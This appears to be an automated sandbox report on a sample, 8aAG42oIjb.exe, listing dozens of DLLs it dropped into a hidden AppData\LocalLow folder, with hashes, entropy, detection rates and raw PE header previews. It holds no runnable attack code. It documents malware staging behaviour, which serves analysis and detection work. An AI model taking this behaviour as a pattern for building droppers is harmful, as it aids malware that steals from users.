Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...\|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	123344
Entropy (8bit):	6.504957642040826
Encrypted:	false
SSDEEP:	1536:DkO/6RZFrpiS7ewflNGa35iOrjmwWTYP1KxBxZJByEJMBrsuLeLsWxcdaocACs0K:biRZFdBiussQ1MBjq2aocts03/7FE
MD5:	F92586E9CC1F12223B7EEB1A8CD4323C
SHA1:	F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
SHA-256:	A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
SHA-512:	5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.Z.............x.......x.......x......=z......=z......=z.......x.......x..........z.../{....../{....../{....../{b...../{......Rich............PE..L...C@.\.........."!.................b.......0......................................~p....@.................................p...........h...........................0...T................... ...........@............0..$............................text...7........................... ..`.orpc........ ...................... ..`.rdata...y...0...z..................@..@.data...............................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26064
Entropy (8bit):	5.981632010321345
Encrypted:	false
SSDEEP:	384:KuAjyb0Xc6JzVuLoW2XDOc3TXg1hjsvDG8A3OPLon07zS:BEygs6RV6oW2Xd38njiDG8Mj
MD5:	A7FABF3DCE008915CEE4FFC338FA1CE6
SHA1:	F411FB41181C79FBA0516D5674D07444E98E7C92
SHA-256:	D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
SHA-512:	3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S......U...U...U...U...U..T...U..T...U..T...U..T...U5.T...U...U!..U..T...U..T...U...U...U..T...URich...U........PE..L...<@.\.........."!.........8......0........0.......................................7....@..........................=......0>..x....`...............H..........<...09..T............................9..@............0...............................text...f........................... ..`.orpc........ ...................... ..`.rdata.......0......................@..@.data...@....P.......(..............@....rsrc........`.......*..............@..@.reloc..<............D..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70608
Entropy (8bit):	5.389701090881864
Encrypted:	false
SSDEEP:	768:3n8PHF564hn4wva3AVqH5PmE0SjA6QM0avrDG8MR43:38th4wvaQVE5PRl0xs
MD5:	5243F66EF4595D9D8902069EED8777E2
SHA1:	1FB7F82CD5F1376C5378CD88F853727AB1CC439E
SHA-256:	621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
SHA-512:	A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.....K...K...K.g.K...K4}.J...K4}.J...K4}.J...K4}.J...K...J...K...J...K...K...K&\|.J...K&\|.J...K&\|uK...K&\|.J...KRich...K........PE..L...J@.\.........."!.................$.......0...............................0............@.........................0z.......z...........v................... .......u..T...........................Hv..@............0...............................orpc...t........................... ..`.text........ ...................... ..`.rdata...Q...0...R..................@..@.data................j..............@....rsrc....v.......x...t..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	6.2121285323374185
Encrypted:	false
SSDEEP:	384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
MD5:	7CD244C3FC13C90487127B8D82F0B264
SHA1:	09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:	BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:	C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	6.2121285323374185
Encrypted:	false
SSDEEP:	384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
MD5:	7CD244C3FC13C90487127B8D82F0B264
SHA1:	09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:	BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:	C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.112057846012794
Encrypted:	false
SSDEEP:	192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
MD5:	E2F648AE40D234A3892E1455B4DBBE05
SHA1:	D9D750E828B629CFB7B402A3442947545D8D781B
SHA-256:	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
SHA-512:	18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.166618249693435
Encrypted:	false
SSDEEP:	192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
MD5:	E479444BDD4AE4577FD32314A68F5D28
SHA1:	77EDF9509A252E886D4DA388BF9C9294D95498EB
SHA-256:	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
SHA-512:	2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..\|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..\|........8...T...T.......4..\|........d...............4..\|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..\|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1117101479630005
Encrypted:	false
SSDEEP:	384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
MD5:	6DB54065B33861967B491DD1C8FD8595
SHA1:	ED0938BBC0E2A863859AAD64606B8FC4C69B810A
SHA-256:	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
SHA-512:	AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...\|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.174986589968396
Encrypted:	false
SSDEEP:	192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
MD5:	2EA3901D7B50BF6071EC8732371B821C
SHA1:	E7BE926F0F7D842271F7EDC7A4989544F4477DA7
SHA-256:	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
SHA-512:	6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17856
Entropy (8bit):	7.076803035880586
Encrypted:	false
SSDEEP:	192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
MD5:	D97A1CB141C6806F0101A5ED2673A63D
SHA1:	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
SHA-256:	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
SHA-512:	0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.131154779640255
Encrypted:	false
SSDEEP:	384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
MD5:	D0873E21721D04E20B6FFB038ACCF2F1
SHA1:	9E39E505D80D67B347B19A349A1532746C1F7F88
SHA-256:	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
SHA-512:	4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....ul...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....ul........A...T...T........ul........d................ul....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............ul....................(...p...........R...}..................Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.089032314841867
Encrypted:	false
SSDEEP:	384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
MD5:	EFF11130BFE0D9C90C0026BF2FB219AE
SHA1:	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
SHA-256:	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
SHA-512:	8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.101895292899441
Encrypted:	false
SSDEEP:	384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
MD5:	D500D9E24F33933956DF0E26F087FD91
SHA1:	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
SHA-256:	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
SHA-512:	C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...\|...................=...................................api-ms-win-core-memory-l1-1-0.dl

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.16337963516533
Encrypted:	false
SSDEEP:	192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
MD5:	6F6796D1278670CCE6E2D85199623E27
SHA1:	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
SHA-256:	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
SHA-512:	6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.073730829887072
Encrypted:	false
SSDEEP:	192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
MD5:	5F73A814936C8E7E4A2DFD68876143C8
SHA1:	D960016C4F553E461AFB5B06B039A15D2E76135E
SHA-256:	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
SHA-512:	77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...\|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19392
Entropy (8bit):	7.082421046253008
Encrypted:	false
SSDEEP:	384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
MD5:	A2D7D7711F9C0E3E065B2929FF342666
SHA1:	A17B1F36E73B82EF9BFB831058F187535A550EB8
SHA-256:	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
SHA-512:	D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.1156948849491055
Encrypted:	false
SSDEEP:	384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
MD5:	D0289835D97D103BAD0DD7B9637538A1
SHA1:	8CEEBE1E9ABB0044808122557DE8AAB28AD14575
SHA-256:	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
SHA-512:	97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17712
Entropy (8bit):	7.187691342157284
Encrypted:	false
SSDEEP:	192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
MD5:	FEE0926AA1BF00F2BEC9DA5DB7B2DE56
SHA1:	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
SHA-256:	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
SHA-512:	0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17720
Entropy (8bit):	7.19694878324007
Encrypted:	false
SSDEEP:	384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
MD5:	FDBA0DB0A1652D86CD471EAA509E56EA
SHA1:	3197CB45787D47BAC80223E3E98851E48A122EFA
SHA-256:	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
SHA-512:	E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
Malicious:	false
